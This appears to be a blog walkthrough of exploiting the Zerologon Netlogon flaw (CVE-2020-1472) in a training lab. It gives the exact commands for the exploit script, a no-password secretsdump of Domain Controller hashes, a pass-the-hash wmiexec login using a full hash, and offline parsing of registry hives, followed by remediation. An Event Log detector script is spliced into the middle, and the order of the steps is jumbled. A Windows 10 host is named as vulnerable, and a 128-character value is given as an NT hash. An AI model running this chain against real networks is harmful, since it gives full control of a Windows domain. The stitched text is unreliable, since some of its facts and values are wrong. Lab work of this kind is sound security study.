CVE-2020-1472 (Zerologon Vulnerability) - Exploitation & Remediation
Zerologon (CVE 2020-1472) Vulnerability
Last updated
NOTE: This is my first vulnerability-related writeup and I have tried to write and explain it in layman's terms. There may be knowledge gaps in between, which I am trying my hardest to cover and understand.
I have tried to reproduce the vulnerability in this blog entry, while trying to understand its severity and impact.
Netlogon is a service that runs on the Domain Controller. This service is responsible for authenticating user logins — effectively verifying the user is who they claim to be. As this function is one of the core functions of a Domain Controller, the Netlogon service cannot be stopped or firewalled off from networks of domain-joined computers.
CVSS Score — 10
Attack Complexity — Low
Privileges Required — Low
Vulnerability Found — July 2020
The Netlogon RPC service, used for computer and user authentication in Windows, also allows a computer to update its computer password within the domain. For several historical reasons, this service does not use standard authentication protocols to authenticate the computer. The vulnerability exists within the non-standard method used to authenticate.
Twitter thread providing a nice walkthrough — https://twitter.com/_dirkjan/status/1306280553281449985
What do you need?
Impacket — to capture password hashes and dump them
Windows 10 OS (on which the vulnerable service exists)
Windows 10 VM — to perform the exploit on RangeForce's ZeroLogon Vulnerability Lab (Guided Mode)
First, let's clone the impacket repository from Github.
Steps to install:-
Now, let's copy the exploit script, cve-2020-1472-exploit.py, from Github as well.
Credits to dirkjanm.
https://github.com/dirkjanm/CVE-2020-1472/blob/master/cve-2020-1472-exploit.py
Save the exploit to /impacket/examples/CVE-2020-1472/
Now, let's switch to this directory.
By now, we have identified the following details about the vulnerable service:-
NetBIOS computer name: DC
IP address: 192.168.0.4
Syntax of the exploit command:- ./cve-2020-1472-exploit.py -n <NetBIOS computer name> -t <IP address>
Now, run the script to exploit the vulnerability:
./cve-2020-1472-exploit.py -n DC -t 192.168.0.4
It resets the Domain Controller's machine account password to an empty string, so logging in as that account requires no password at all.
The gist: your Domain Controller account's password is now a blank string.
Next objective — dump password hashes from the Domain Controller
Details required: Domain Controller name, NetBIOS name, and IP address of the vulnerable host
We make use of the secretsdump.py module from Impacket to perform this task.
Password dump command syntax:- python3 secretsdump.py -no-pass -just-dc <DOMAIN>/<NETBIOS_NAME>\$@<IP address>
(Unlike the exploit script, this one is invoked with python3 rather than by running ./secretsdump.py directly.)
Filling in the blanks:-
python3 secretsdump.py -no-pass -just-dc CONTOSO.AZURE/DC\$@192.168.0.4
This leads to the dumping of around 60 password hashes:-
Next objective — Logging onto the account of ContosoAdmin (Domain Controller admin’s account) — using the account’s dumped hash
Scrolling through the dumped list, we find the appropriate entry:-
Logging on to the server, using the wmiexec.py module:-
python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:a2bd759faf686d052f5f7c8337a2ff51 CONTOSO.AZURE/DC\$@192.168.0.4
We are in!
How do we remediate?
Manually restoring the original password (or)
Installing the August 2020 and February 2021 Patch Tuesday updates for this CVE (the fix was released in two phases)
When the vulnerability is exploited, the password hash is erased and replaced with a blank string in the SAM file, which is what the computer checks passwords against when a user logs in.
Using the same methodology, we copy the compromised credential store (containing the blank password in this case) from the SAM hive of the exploited Domain Controller. We then copy it to the Kali VM and delete it from the Domain Controller.
This is achieved through the following steps:-
Now exit the Windows machine (using exit) and return to the Kali machine.
The next task is to parse the SAM file obtained from the Domain Controller.
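Added example (not part of the original write-up): a small detector that flags the blank-password reset described above. It looks for Security event 4742 (computer account changed) where the acting identity is ANONYMOUS LOGON and the target is a machine account such as DC$, and for the Netlogon events 5827-5831 that patched Domain Controllers log for vulnerable secure-channel connections. The event records are constructed sample data, not real logs from the lab.

```python
# Constructed sample events modelled on the lab in this write-up (DC / CONTOSO.AZURE).
SAMPLE_EVENTS = [
    {"EventID": 4742, "SubjectUserName": "ANONYMOUS LOGON",
     "TargetUserName": "DC$", "Computer": "DC.CONTOSO.AZURE"},
    {"EventID": 4742, "SubjectUserName": "svc-admin",
     "TargetUserName": "WS01$", "Computer": "DC.CONTOSO.AZURE"},
    {"EventID": 5829, "SubjectUserName": "",
     "TargetUserName": "DC$", "Computer": "DC.CONTOSO.AZURE"},
    {"EventID": 4624, "SubjectUserName": "ANONYMOUS LOGON",
     "TargetUserName": "ANONYMOUS LOGON", "Computer": "DC.CONTOSO.AZURE"},
]

# Netlogon events introduced by the August 2020 update (KB4557222).
NETLOGON_DENIED = {5827, 5828}          # vulnerable connection denied
NETLOGON_ALLOWED = {5829, 5830, 5831}   # vulnerable connection still allowed


def is_machine_account(name):
    """Computer and trust accounts in AD end with a dollar sign."""
    return name.endswith("$")


def find_zerologon_indicators(events):
    """Return (indicator, account) tuples for events worth an analyst's attention."""
    findings = []
    for e in events:
        subject = e.get("SubjectUserName", "").upper()
        target = e.get("TargetUserName", "")
        if e["EventID"] == 4742 and subject == "ANONYMOUS LOGON" \
                and is_machine_account(target):
            # A machine account changed by an unauthenticated caller: the
            # pattern left behind when Zerologon resets the DC$ password.
            findings.append(("machine-account-changed-by-anonymous", target))
        elif e["EventID"] in NETLOGON_DENIED:
            findings.append(("vulnerable-netlogon-connection-denied", target))
        elif e["EventID"] in NETLOGON_ALLOWED:
            # Seen only while the DC is still in the initial deployment phase
            # or the account is explicitly allow-listed by group policy.
            findings.append(("vulnerable-netlogon-connection-allowed", target))
    return findings


if __name__ == "__main__":
    for indicator, account in find_zerologon_indicators(SAMPLE_EVENTS):
        print(f"{indicator}: {account}")
```

A 5829/5830/5831 hit on a DC that should already be in enforcement mode is itself a remediation gap, not just a detection.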
Recovered password hash — 89ed2eb25e25770b7dd850e797ef8c7b49cc4d793ea50f9db33fe91cde5b97c20b8aa582a3acd371618e7f7ed5ad9ee87df1d073641c6718cb63ed7409711480
Now to place the final piece of the jigsaw — restoring the original password. For that, we have a customized script named reinstall_original_pw.py.
Syntax — reinstall_original_pw.py <DC_NETBIOS_NAME> <DC_IP_ADDR> <ORIG_NT_HASH>
Filling in the blanks here:-
./reinstall_original_pw.py DC 192.168.0.4 89ed2eb25e25770b7dd850e797ef8c7b49cc4d793ea50f9db33fe91cde5b97c20b8aa582a3acd371618e7f7ed5ad9ee87df1d073641c6718cb63ed7409711480
This is an easy vulnerability to exploit, with low complexity, and it matters because we still depend on these IT systems to perform administrative tasks. This may be disputed, but 100% security may be a myth unless drastic action is taken to respond to and patch even the slightest of issues.
Thank you for the time taken to devour this purple team blog entry.
My audience has a voice. Feel free to reach out to me on my socials (links are at the top of this page) with any queries. Dropping a sweet message would make my day.
Parsing the saved hives offline with Impacket:-
secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
Why parse? — To see where accounts are mapped to and to gain other information.